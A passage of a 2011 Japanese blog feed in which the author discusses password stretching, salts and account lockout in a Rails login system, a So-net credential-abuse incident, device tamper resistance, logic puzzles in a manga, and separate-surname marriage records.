href="../genre/Nightmare">Nightmare</a></span></p></div></div></content></entry><entry><title>徳丸本のあれこれを実践してみて気付いたこと</title><link href="http://bakera.jp/ebi/topic/4441" /><id>tag:bakera.jp,2008:/ebi/topic/4441</id><updated>2011-07-09T23:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2011/6/16">2011年6月16日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/4441">徳丸本のあれこれを実践してみて気付いたこと</a></h2><p class="subinfo"><span class="updated">更新: 2011年7月9日23時0分頃</span></p><p><a href="../topic/4421">とあるシステムで徳丸本のストレッチングを採用することにした</a>という話がありましたが、その実装が佳境に入ってきました。私は指示だけ出して、実装はお任せ……と思っていたのですが、基本的な部分を作ってもらったところでバトンタッチされ、私が引き継ぐ形で実際にコードを書くことになりました。</p><p>基本的には<span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4797361190&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">徳丸本</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4797361190" alt="" width="1" height="1" /></span>のオススメどおりの実装にするという方針なのですが、実際にコードを書いてみると、いろいろと気になったり迷ったりした事も出てきました。そのあたりを簡単にメモしておきます。</p><p class="note">※ちなみに、このシステムはRuby1.9.2 + Ruby on Rails3での実装なので、PHPのコードサンプルをそのまま使っているわけではありません。</p><div class="section"><h3 id="section5">ストレッチ回数をどう決めるのか</h3><p>徳丸本327ページにあるコード例を参考にして実装。アプリケーションごとの固有の値とユーザーIDを連結してソルト値とし、パスワードと連結してハッシュ値を生成。ストレッチングは、回数を設定ファイルに記述できるようにして、1000回に設定。ハッシュ値にソルトを連結してハッシュ、という動作を1000回繰り返します。</p><p>処理の負荷を心配していたのですがが、実際に動作させてみると一瞬で終了。むしろ回数はもっと増やしても良いのかもしれません。</p><p>回数の設定は設定ファイルに出したので、変えるのは簡単です。しかし、この数字を変えると、既存のユーザーがログインできなくなるという問題があります。運用開始前にしっかり検討して決めておく必要があるのですが、実際に運用してみないと負荷が分からないというパラドックスがあります。</p><p>この回数をどう決めるのかは、かなり難しい問題かもしれません。</p></div><div class="section"><h3 id="section6">ユーザーIDを変更するとログインできない問題</h3><p>いろいろテストしていたら、唐突にログインできなくなるという不具合が発覚。調べてみたところ、ユーザーIDを変更するとログインができなくなることが判明。……って、言われてみればあたりまえの話でした。ユーザーIDをソルトに使っているわけですから、ユーザーIDが変化すると、ハッシュ値も異なるものになります。</p><p>対応方法はいくつか考えられます。</p><ul><li>ユーザーIDを変更したときにハッシュ値を作り直す …… ユーザーIDを変更してユーザー情報を保存するときに、ハッシュ値を作り直すという方法。ハッシュ値を作り直すためには元のパスワードが必要なので、ユーザーID変更時に元のパスワードを入力してもらう必要があります。ユーザーが自ら変更する場合には問題ないのですが、管理者がユーザーIDを変更する機能がある場合は採用できません (管理者はユーザーのパスワードを知らないため)。</li><li>ソルトにユーザーIDを使用するのをやめ、DBレコードのIDを使用する …… ユーザーIDではなく、DBのレコードが持っているIDをソルトに使う方法。これは一見良さそうですが、ユーザーを新規作成するときの処理が面倒です。user = User.newとしてUserモデルのインスタンスを作成し、ハッシュ値をセットしてuser.save……としたいのですが、IDが決まるのはuser.saveが完了したときなのです。そのため、save前にはハッシュを作れません。User.new→user.save→ハッシュ値をセット→user.saveという具合にsaveを2回呼ぶ必要があります。これはこれで動くのですが、何らかの理由で2回目のsaveだけが失敗すると、絶対にログインできないユーザーがDBに残ってしまいます。</li><li>ソルトにユーザーIDを使用するのをやめ、専用のソルト値をDBに保存する …… 乱数で専用のソルト値を生成して、DBに保存しておく方法。徳丸本326ページにある「乱数をソルトとして使う」方法です。DBのカラムがひとつ増えますが、特に問題はないと思います。</li></ul><p>というわけで最後の方法を採用しようかとも思ったのですが、よく考えると、そもそも、ユーザーIDを変更する機能自体が不要でした。単にユーザー情報変更のフォームがscaffold (Railsによって自動生成されたモノ) のままで、不要な機能が残っていただけだったという。</p><p>ユーザーIDが変更できなければ問題ないので、これはこれで解決。ユーザーIDを変更する機能を持つ余地がある場合には、ソルト値をDBに保存するようにするのが良いと思います。</p></div><div class="section"><h3 id="section7">アカウントロックの実装</h3><p>徳丸本315ページでアカウントロックが推奨されているので、これも実装。</p><p>最終ログイン失敗時刻を覚えておき、ログイン失敗をカウントして、10回になったら30分ロックするだけの簡単なお仕事……と思いきや、意外と考えなければならないことが多いです。</p><p>単にログイン失敗をカウントすると、アカウントロック後に正しいパスワードでログインしようとした場合にも失敗とカウントしてしまい、正しいパスワードを入れ続けているのにログインできないという問題が起きます (パスワード間違いの場合だけをカウントする必要があります)。また、ログインに成功したら、ログイン失敗カウントをクリアする必要があります。これを忘れると次回のロックが異常に素早くなります。まあ、このようなバグはテストすればすぐに発覚するので、大きな問題になることはないでしょう。</p><p>アカウントロックを実装すると、DBへのアクセスの仕方も変わってきます。徳丸本308ページには、以下のようにあります。</p><div class="quote-and-cite"><blockquote><p>ログイン機能は、通常、以下のようなSQL文を用いて、IDとパスワードの両方が一致するユーザを検索し、ユーザが存在すればログインできたと見なします。</p><p>SELECT * FROM usermaster WHERE id=? AND password=?</p></blockquote></div><p>ユーザーIDとパスワード (のハッシュ値) の両方をキーにしてユーザーを取得しているわけですが、何も考えずにアカウントロックの処理を追加すると、こうなってしまいます。</p><ul><li>ユーザーIDとパスワードからハッシュ値を算出</li><li>ユーザーIDとハッシュ値をキーにしてユーザーを取得</li><li>ユーザーが取得できなかった場合、ユーザーIDだけをキーにしてあらためてユーザーを取得</li><li>ユーザーが取得できたらログイン失敗情報を書き込み</li></ul><p>この場合、ログインに失敗すると2回のDBアクセスが発生することになります。これは1回にまとめることができます。</p><ul><li>ユーザーIDだけをキーにしてユーザーを取得 (ユーザーが取得できなかったらログイン失敗、ここで終了)</li><li>ユーザーIDとパスワードからハッシュ値を算出</li><li>ハッシュ値が一致しなければログイン失敗、失敗情報を書き込み</li></ul><p>ここで気になるのが、ハッシュ値を計算するタイミングです。ストレッチング回数の設定によっては、この計算には時間がかかります。一般的に、ログイン失敗時にユーザーが存在するのかどうかが分かるのは良くないとされています (徳丸本338～339ページ)。最後のような実装を採用した場合、ユーザーが存在した場合だけハッシュ値を計算することになるので、ユーザーの有無で処理にかかる時間に差が出てしまいます。</p><p>そこで、処理の順番を入れ替えて、以下のようにしました。</p><ul><li>ユーザーIDとパスワードからハッシュ値を算出</li><li>ユーザーIDだけをキーにしてユーザーを取得 (ユーザーが取得できなかったらログイン失敗、ここで終了)</li><li>ハッシュ値が一致しなければログイン失敗、失敗情報を書き込み</li></ul><p>この場合、ユーザーIDが間違っているときにもハッシュ値を計算します。これは無駄ではあるのですが、そうしないとユーザーの存在を推測されてしまう可能性があります。</p><p>ちなみに、ユーザーIDが入力されていない場合には、何も処理しないで「ユーザーIDを入力してください」というエラーを出すようにしています。ユーザーIDが空の場合にユーザーが存在しないことは明らかなので、これを隠す必要はありません。</p></div><div class="section"><h3 id="section8">CookieStoreによるセッション管理</h3><p>ここからは余談になります。</p><p>徳丸本46ページ、「クッキーによるセッション管理」の項目には、以下のような記述があります。</p><div class="quote-and-cite"><blockquote><p>クッキーは少量のデータをブラウザ側で覚えておけるものですが、アプリケーションデータを保持する目的でクッキーそのものに値を入れることはあまり行われません。その理由は以下の通りです。</p><ul><li>クッキーが保持できる値の個数や文字列長には制限がある</li><li>クッキーの値は利用者本人が参照・変更できるので、秘密情報の格納には向かない</li></ul></blockquote></div><p>さらに、206～207ページにもCookieに不用意に情報を格納することの危険性について書かれています。</p><p>しかしRails2以降では、"CookieStore" というセッション管理方法がデフォルトになっています。これはCookieにセッションデータを丸ごと格納してしまうという方法で、まさに徳丸本で駄目出しされている方法そのものに見えます。……が、実はHMAC (鍵付きハッシュ) がつけられていて、利用者本人による値の改竄ができないようになっています。</p><p>ちなみに、データ本体はMarshal.dumpしたものをBase64エンコードしているだけで、特に暗号化はされていません。セッションデータの内容を閲覧することは可能なので、そこは注意が必要です。もっとも、ユーザー本人に閲覧されて困るものをセッションに格納する機会はほとんどないと思いますが。</p><p class="note">※「ログイン済み」という情報をセッションに書き込むと確実にCookieの値が変化するため、<dfn class="glossary"><a href="../../glossary/%E3%82%BB%E3%83%83%E3%82%B7%E3%83%A7%E3%83%B3%E5%9B%BA%E5%AE%9A%E6%94%BB%E6%92%83">セッション固定攻撃</a></dfn>ができないという変な副次的作用もあったりして、なかなか面白いようです。</p><p class="note">※2011-07-09追記: その後、ストレッチ処理を少し変更してみました:「<a href="../topic/4457">続・徳丸本のあれこれ ストレッチング処理の変更</a>」</p></div><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/4441/comment">「徳丸本のあれこれを実践してみて気付いたこと」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E3%83%97%E3%83%AD%E3%82%B0%E3%83%A9%E3%83%9F%E3%83%B3%E3%82%B0">プログラミング</a> / <a href="../genre/Ruby">Ruby</a> / <a href="../genre/%E5%BE%B3%E4%B8%B8%E6%9C%AC">徳丸本</a> / <a href="../genre/Nightmare">Nightmare</a></span></p></div></div></content></entry><entry><title>ストレッチング採用の理由</title><link href="http://bakera.jp/ebi/topic/4421" /><id>tag:bakera.jp,2008:/ebi/topic/4421</id><updated>2011-05-30T10:50:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2011/5/25">2011年5月25日(水曜日)</a></h1><div class="topic"><h2><a href="../topic/4421">ストレッチング採用の理由</a></h2><p class="subinfo"><span class="updated">更新: 2011年5月30日10時50分頃</span></p><p>徳丸さんに誘われ、<span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4797361190&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">徳丸本</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4797361190" alt="" width="1" height="1" /></span>レビュアー中心に6名ほどで飲み食いしながら四方山話をしたり。</p><p>翌日に徳丸さんはこんなつぶやきをしておられますが、</p><div class="quote-and-cite"><blockquote cite="http://twitter.com/ockeghem/status/73526372642988032"><p>同じく昨日の一言。「パスワードのストレッチングについては効果を疑問視する声もあったが、『教科書』にベストプラクティスとして載っている以上、最低限そこまではやるべきと主張して、徳丸本の通りに実装することにした」&lt;こういう声は嬉しいですね</p></blockquote><p class="cite">以上、<a href="http://twitter.com/ockeghem/status/73526372642988032">http://twitter.com/ockeghem/status/73526372642988032</a> より</p></div><p>これは私の発言ですね。せっかくなので、もう少し流れを補足しておきます。</p><p>サーバ側でパスワードを保存する際、パスワードそのものではなく、ハッシュ関数を通したハッシュ値を保存することが良く行われます。これによって、たとえDBの値が漏洩しても、生のパスワードが漏れることがなくなります。とはいえ、攻撃者はハッシュ値を作りながら総当たりをすることも可能ですし、事前にハッシュ値のデータベースを作っておいて攻撃するような手法もあります。</p><p>そこで考えられたのが、ハッシュ関数を何度も使った結果を保存するという手法です。こうすると、攻撃者がハッシュ値をつくりながら攻撃をするのに時間がかかるようになり、総当たりに必要な時間を増加させることができるようになります。この、ハッシュ関数を何度も使うことによって時間を稼ぐ方法を「ストレッチング」と呼んでいます。</p><p class="note">※時間を稼ぐほかに、ハッシュ値生成のアルゴリズムが分かりにくくなるという効果も無くはないのですが、DBの値が漏れているような状況ではソースコードが漏れている可能性もありますし、攻撃者は自らアカウントを取得してハッシュ値がどうなるかを調べることもできます。アルゴリズムはばれている前提で考えるべきです。</p><p>さて、実は今、社内であるシステムを開発しているのですが、パスワードを保存する際の仕様ががっちりと決まっていなかったので、どうするのか議論になりました。ソルトをつけてハッシュ値を保存するところまでは良いとして、ストレッチングのような処理が本当に必要なのかどうか、というのが議論のポイントです。</p><p>セキュアプログラミングの要素の多くは、議論の余地無く採用されるものです。<dfn class="glossary"><a href="../../glossary/XSS">XSS</a></dfn>や<dfn class="glossary"><a href="../../glossary/SQL%E3%82%A4%E3%83%B3%E3%82%B8%E3%82%A7%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3">SQLインジェクション</a></dfn>は単なるバグで、その対応はアプリケーションの正常動作ために必要です。CSRFへの対策も、その必要性は明らかです。</p><p>しかし、このストレッチングはアプリケーションの動作に必須のものではありません。DBの中身が漏洩する事故が起きて初めて意味を持ちますが、それにしても必要性がどの程度あるのか疑問です。長めのソルトをつけてハッシュしてやれば、それだけで十分なのではないかとも思えます。メリットがいまいち分かりにくい上に、平時はCPUパワーを浪費したり動作が遅くなったりするデメリットもあります。</p><p class="note">※動作を遅くすることが目的なので、プログラミングの工夫で速くすることもできません。</p><p>というわけで、技術的にはメリットとデメリットの両方があって何ともいえず、採用するかどうか決められませんでした。にもかかわらず採用することに決めたのは、技術的な必要性というよりも、政治的な必要性があったからです。何かセキュリティ事故が起きて、「十分な対策を行っていたか?」と問われたときに、「よく知られた手法があるのに、それを採用していなかったではないか」と責められると厳しいでしょう。つまり、「有名書籍に肯定的に書かれている」ということ自体が採用の理由になっています。</p><p class="note">※2011-05-30追記: ちょっと語弊があった気がするので補足しておきます。「技術的に不要だと判断したのに政治的な理由で無理矢理実装させられた」というネガティブな話ではなくて、単に「技術的には要・不要の決断ができなかったので、政治的な理由で決定に至った」ということです。本文も少し修正しました。</p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/4421/comment">「ストレッチング採用の理由」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E5%BE%B3%E4%B8%B8%E6%9C%AC">徳丸本</a> / <a href="../genre/Nightmare">Nightmare</a></span></p></div></div></content></entry><entry><title>So-netで不正アクセス</title><link href="http://bakera.jp/ebi/topic/4419" /><id>tag:bakera.jp,2008:/ebi/topic/4419</id><updated>2011-05-22T20:30:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2011/5/21">2011年5月21日(土曜日)</a></h1><div class="topic"><h2><a href="../topic/4419">So-netで不正アクセス</a></h2><p class="subinfo"><span class="updated">更新: 2011年5月22日20時30分頃</span></p><p>So-netで不正アクセスの被害が発生しているそうで。</p><ul><li><a href="http://www.so-net.ne.jp/support/information/110519.html">“なりすまし”による「ソネットポイント」の不正利用への対応について</a> <em class="domain-info">(www.so-net.ne.jp)</em></li><li><a href="http://www.itmedia.co.jp/news/articles/1105/20/news106.html">So-net、ポイントサービスで不正利用発覚　第三者が会員なりすまし</a> <em class="domain-info">(www.itmedia.co.jp)</em></li><li><a href="http://www.asahi.com/business/update/0520/TKY201105200424.html">ソニー系接続会社に不正アクセス　ポイント１０万円被害</a> <em class="domain-info">(www.asahi.com)</em></li></ul><p>「ソニー系接続会社」という表現は斬新……というか、そう言われてはじめてSo-netがソニー系だったということを思い出したような次第です。</p><p>ともあれSo-netの発表によると、不正アクセスの具合はこのような感じになっています。</p><div class="quote-and-cite"><blockquote cite="http://www.so-net.ne.jp/support/information/110519.html"><ul><li>特定 IPアドレスからの不正アクセス試行回数 ： 約 10,000回</li><li>「ソネットポイント」の不正な交換に使用された ID数 ： 128</li><li>「ソネットポイント」の不正な閲覧に使用された ID数 ： 73</li><li>「ソネットポイント」にて不正な交換が行われたポイント数 ： 105,500ポイント (約 10万円相当)</li><li>「Webメール」の不正な閲覧に使用された ID数 ： 90</li></ul></blockquote><p class="cite">以上、<a href="http://www.so-net.ne.jp/support/information/110519.html">“なりすまし”による「ソネットポイント」の不正利用への対応について</a> より</p></div><p>閲覧+交換のようなケースが重複してカウントされているのかどうかが良く分かりませんが、約1万回の試行が行われて、突破されたアカウントが128～291。パスワードを固定してアカウントの方を回していく、リバースブルートフォース攻撃でしょうか?</p><p>リバースブルートフォースだとすると、サービス側で対処するのはそれほど簡単ではありません。同一IPアドレスからの連続試行をブロックすることはできますが、踏み台を使われてIPアドレスを変えられると突破されてしまいます。</p><p>サービス側でできることは、パスワードに複雑性を求める (あまり単純なパスワードは使用できないようにする) というところです。このあたりの要件がどうなっていたのかが気になりますね。</p><p class="note">※ただ、突破率がちょっと高いような気もするので、単なるブルートフォースではない可能性も考えられますが。</p><p class="note">※追記: 春山さんから「<a href="http://twitter.com/haruyama/status/72261273194201089"><q cite="http://twitter.com/haruyama/status/72261273194201089">so-netへの攻撃は, so-netには関係ないサービスでid/passのリストが漏れて, そのリストを利用したものじゃないかと推測しています</q></a>」というコメントをいただきました。十分にあり得ると思いますし、よりすっきり説明できますね。そして、仮にそうであれば、サービス側でできる対応は「パスワードを使い回さないでください」とアナウンスすることくらいしかないと思います……。</p><ul class="comment-link"><li><a href="../topic/4419/comment">「So-netで不正アクセス」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a></span></p></div></div></content></entry><entry><title>端末の耐タンパ性とネットワークセキュリティ</title><link href="http://bakera.jp/ebi/topic/4406" /><id>tag:bakera.jp,2008:/ebi/topic/4406</id><updated>2011-05-08T17:25:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2011/5/6">2011年5月6日(金曜日)</a></h1><div class="topic"><h2><a href="../topic/4406">端末の耐タンパ性とネットワークセキュリティ</a></h2><p class="subinfo"><span class="updated">更新: 2011年5月8日17時25分頃</span></p><p>「<a href="http://pc.nikkeibp.co.jp/article/column/20110502/1031621/">サーバーとの通信を2重暗号化するなどの対策が急務</a> <em class="domain-info">(pc.nikkeibp.co.jp)</em>」。</p><div class="quote-and-cite"><blockquote><p>SSLは盗聴では解読は困難ですが、MIM(Man In the Middle:中間者攻撃)を行えば、通信の内容は平文で取り出すことが可能です。</p><p class="snip"><em>(～中略～)</em></p><p>これまでネット家電やゲーム機では「外部からの攻撃」に対して対策が取られていました。また、ネット家電やゲーム機が直接侵入されたり踏み台にされたりしないような対策ということが論じられてきました。しかし、サーバーとの通信を密に行うようなケースでは、サーバーとの通信の2重の暗号化などの総合的な対策が必要とされます。</p></blockquote></div><p>これはちょっとわかりにくい記事だと思いました。</p><p>まず、普通の利用者が普通に利用する際に中間者攻撃が問題になることはないはずです。サーバ証明書を検証することによって中間者攻撃を防ぐ仕組みがありますので、普通の利用者は中間者攻撃を恐れる必要はありません (<span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/B002LZTX0U&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">PS3</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=B002LZTX0U" alt="" width="1" height="1" /></span>自体に脆弱性がなければの話ですが)。</p><p>利用者が意図的に自身のPS3を改造して証明書を入れ替えたり、証明書検証を無効にしたりすれば、中間者攻撃が可能になります。これは、攻撃者が自身のPS3を解析するための手法として利用できます。</p><p>普通のPCの場合、そんなことをしなくても自由にプログラムを動かして解析できますが、ゲーム機の場合は解析が難しくされていることがあります。これはいわゆる「ハック」であったり、不正コピーしたゲームソフトを動かしたり、といった行為への対策です。このような、解析や改造をされにくい性質のことを「耐タンパ性」(tamper registance) と言ったりします。</p><p>端末の耐タンパ性とネットワークのセキュリティには、直接の関係はありません。もとより、ネットワーク機器の側では、端末の耐タンパ性をあてにしてはなりません。解析で攻撃のヒントが得られることはありえますが、今回の情報漏洩事件は、「機器を解析されて……」というような高度な攻撃ではなく、単にアプリケーションサーバの既知の脆弱性が突かれたという話になっています。</p><p class="note">※PSNの通信先のサーバが解析で割り出された可能性はあるのかもしれませんが、SSL/TLSでもパケットの送り先やポートは普通に見えます。通信先を割り出すだけなら、中間者攻撃をするまでもありません。</p><p>「2重の暗号化」というのも、機器の耐タンパ性を高めるための施策でしょう。漏洩事件と直接の関係はないでしょうし、急務というほどでもないと思います。</p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/4406/comment">「端末の耐タンパ性とネットワークセキュリティ」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/PlayStation%20Network">PlayStation Network</a> / <a href="../genre/%E6%83%85%E5%A0%B1%E6%BC%8F%E6%B4%A9">情報漏洩</a></span></p></div></div></content></entry><entry><title>論理少女5</title><link href="http://bakera.jp/ebi/topic/4350" /><id>tag:bakera.jp,2008:/ebi/topic/4350</id><updated>2011-05-07T18:55:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2011/2/18">2011年2月18日(金曜日)</a></h1><div class="topic"><h2><a href="../topic/4350">論理少女5</a></h2><p class="subinfo"><span class="updated">更新: 2011年5月7日18時55分頃</span></p><p>出ていたので購入。</p><ul><li><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4063762556&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">論理少女 5</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4063762556" alt="" width="1" height="1" /></span></li></ul><p>最終巻でしたか。さすが最終巻というべきか、自分でも考えてみたくなるような面白い問題が多く、楽しめました。<a href="../topic/3254">1巻</a>に次ぐ面白さだったと思います。</p><p>以下、順に気になった問題をメモしておきます。</p><div class="section"><h3 id="section9">ハノイの塔の問題</h3><p>積み重ねたコインを1枚ずつ移動していくパズル。有名な問題ですが、なぜか「ハノイの塔」という名前は出ませんでしたね。</p><p>4枚のコインを移動する手数について、先生の解説では一般化してからn=4を代入していましたが、3枚を動かすのに7手かかることが分かっているはずですから、以下のように分解して考えれば一般化しなくても回答できます。</p><ul><li>まず上の3枚をどかす (7手)</li><li>一番下のコインを移動する (1手)</li><li>どかしていた3枚を上に載せる (7手)</li></ul><p>基本的にハノイの塔は再帰の問題なので、1枚少ない状態の答えが分かっているなら、それをベースに考える方が筋が良いと思います。</p></div><div class="section"><h3 id="section10">水泳部員を一言で追い出す</h3><p>ルールがちょっと曖昧ですね。</p><p>まず、「たった一言」の定義がはっきりしません。霧子の回答より「2、3、6、7、9番は出ていけ」のほうが短くて簡潔な気もします。</p><p>また、霧子の回答では他部員が出ていった後に水泳部員まで出ていくことになりそうです。水泳部員は命令に従わなくて良いということであれば、「全員出ていけ」で済みますし。</p></div><div class="section"><h3 id="section11">長さを求める問題</h3><p>これが今作で一番盛り上がる部分だと思うのですが、いつきの計算方法には問題があると思います。</p><p>いつきは最終的に (31.847×100) / (31.847 + 100) を計算しているのですが、この31.847という数値は、100を3.14で割って求めたものです。しかし、そもそも円周率は3.14ではありませんから、この値は正確ではありません。Google電卓の計算では、3.14とπを使用した場合、それぞれ以下のようになります。</p><ul><li>100 / 3.14 = 31.8471338</li><li>100 / π = 31.8309886</li></ul><p>と、この時点で誤差があることがわかります。いつきはこの数字を丸めた状態で複数回使って計算しているのですが、できるだけπを残して式を解き、最後にπ=3.14を代入するほうが誤差が少なくなるはずです。</p><p>a = 100, b = 100/π のときに 1/a + 1/b = 1/c であるような c を求めれば良いのですから、</p><ul><li>1/100 + π/100 = 1/c</li><li>c = 100 / (π + 1)</li></ul><p>となります。そして 100 / (π + 1) をGoogle電卓で計算すると、こうなります。</p><ul><li>100 / (π + 1) = 24.1453007</li></ul><p>いつきの回答は24.155メートルですから、少し誤差が出ましたね。円周率を3.14とした場合はどうなるかというと……。</p><ul><li>100 / (3.14 + 1) = 24.1545894</li></ul><p>おや、意外にもいつきの回答と一致する結果になりました。いつきの計算方法もGoogle電卓で計算しておくと、</p><ul><li>(31.84700 × 100) / (31.84700 + 100) = 24.1545124</li></ul><p>と、こんな感じです。誤差はありますが、思ったより少ないですね。偶然かもしれませんが結果オーライで。</p><p>よく考えると円周率を3.14とするというルールも無かったような気がするので、そういう意味では誤差はあります。ただ、そもそもどの程度の精度で回答する必要があるのか全く述べられていないわけです。トラックの線がミリ単位の正確さで引かれているとも思えませんし、誤差がどのくらいまで許容されるのかは何とも言えません。「約25メートル」と答えて「精度は指定されていない」と言い張るのも一計かもしれません。</p><p class="note">※2011-05-07 追記: NHKで2010年5月4日に放送された「頭がしびれるテレビ・神はπに何を隠したのか」によると、陸上のトラックの設計では円周率を3.1416として計算することになっているのだそうです。</p></div><div class="section"><h3 id="section12">津隠ダウト</h3><p>ルールがフレキシブルすぎます……。</p><ul><li>霧子がタイムアウトで失格と言われていますが、制限時間があるというルールは説明されていません。</li><li>「カードの山から3枚を持ってテーブルに対峙」とはっきり説明されているのですから、ミーナはルール違反でしょう。</li><li>「相手に1つ質問できる」というルールのはずですが、なぜか相手ではなく先生に、しかも平然と2回質問するいつき。相手に質問しない場合は回数は関係ないのかもしれませんが、いつきの口ぶりはルールで許された「質問」という感じなので……。</li></ul></div><p>あと、細かいですが巻末の「ある日の一日」で沖橋さんが2回登場しているふうですね。実際には2回目は井波さんです。</p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/4350/comment">「論理少女5」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%83%9E%E3%83%B3%E3%82%AC">マンガ</a> / <a href="../genre/%E8%B2%B7%E3%81%84%E7%89%A9">買い物</a> / <a href="../genre/%E8%AB%96%E7%90%86%E5%B0%91%E5%A5%B3">論理少女</a> / <a href="../genre/%E8%AB%96%E7%90%86">論理</a></span></p></div></div></content></entry><entry><title>日本では別姓夫婦を戸籍に記載できる</title><link href="http://bakera.jp/ebi/topic/4326" /><id>tag:bakera.jp,2008:/ebi/topic/4326</id><updated>2011-01-10T17:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2011/1/6">2011年1月6日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/4326">日本では別姓夫婦を戸籍に記載できる</a></h2><p class="subinfo"><span class="updated">更新: 2011年1月10日17時0分頃</span></p><p>「<a href="http://www.asahi.com/national/update/0106/TKY201101060484.html">「夫婦同姓の規定は憲法違反」　事実婚夫婦ら国を提訴へ</a> <em class="domain-info">(www.asahi.com)</em>」。</p><div class="quote-and-cite"><blockquote><p>また、事実婚の夫婦は、国などに婚姻届の不受理処分の取り消しも求める方向だ。婚姻届は一方の姓を選んで提出するが、夫婦は両方の姓を選んだため受理されなかった。</p><p>原告の一人の元高校教諭塚本協子さん（７５）は「一人娘なので姓は変えたくなかった。政権交代で民法改正を期待していたが、解決できないので司法に訴える」と話す。</p></blockquote></div><p>75歳! 別姓での婚姻を戸籍に記載してほしくて届け出たのに拒否され、仕方なくずっと事実婚でやってきたということのようで。</p><p>別姓夫婦は既に結構いるわけですが、現状では、別姓夫婦であるという事実は戸籍に記載されない場合がほとんどです。特に、事実婚で通している場合には婚姻の事実さえ記載されないわけで、これは社会的にも影響が出てきます。たとえば、相続の際は戸籍を頼りにして相続人を調査しますが、戸籍に正確な記載がないと手続きが大変になったり、正しい相続が行われないおそれがあります。</p><p>言うまでもないと思いますが、生活実態を書類に合わせろというのはナンセンスです。書類のほうを生活実態に合わせて、事実を正しく記載するべきでしょう。</p><p>では、なぜ別姓夫婦を戸籍に記載できないのかというと……これは私には分かりません。記載できない積極的な理由は存在しないように思います。というのも、現在既に別姓の配偶者が戸籍に記載されているケースがあるからです。これは具体的には国際結婚の場合で、法務省のサイトに解説があります。</p><div class="quote-and-cite"><blockquote cite="http://www.moj.go.jp/MINJI/minji15.html#name6"><p>1 日本人が外国人と婚姻をした場合には，外国人についての戸籍は作られませんが，配偶者である日本人の戸籍に，その外国人（氏名・生年月日・国籍）と婚姻した事実が記載されます。この場合，その日本人が戸籍の筆頭に記載された者でないときは，その者につき新戸籍が編製されます。</p><p>2 外国人と婚姻しても日本人の氏は当然には変わりません。しかし，外国人の氏を名のりたい場合には，婚姻の日から６か月以内であれば，戸籍届出窓口に氏の変更の届出をするだけで，外国人配偶者の氏に変更することができます。このような氏の変更の届出がされると，氏名は「ジョーダンあゆ美」となります。</p><p>なお，婚姻の日から６か月が過ぎている場合には，家庭裁判所の許可を得た上で，戸籍届出窓口に氏の変更の届出をすれば，氏を変更することができます。</p></blockquote><p class="cite">以上、<a href="http://www.moj.go.jp/MINJI/minji15.html#name6">法務省：国際結婚，海外での出生等に関する戸籍Ｑ＆Ａ</a> より</p></div><p>日本人同士の場合とは記載のされ方は異なりますが、きちんと別姓婚とわかる状態で記載されますし、後半にあるように、届出で同姓にすることもできます。「選択的夫婦別姓」の婚姻制度が、既に運用されているわけです。</p><p>つまり、<em>日本の戸籍制度では、別姓夫婦を戸籍に記載することができる</em>のです。にもかかわらず、夫婦の両方が日本人である場合だけ記載が許されていません。</p><p>日本人の場合だけ禁止する理由は、私には良く分かりません。</p><p 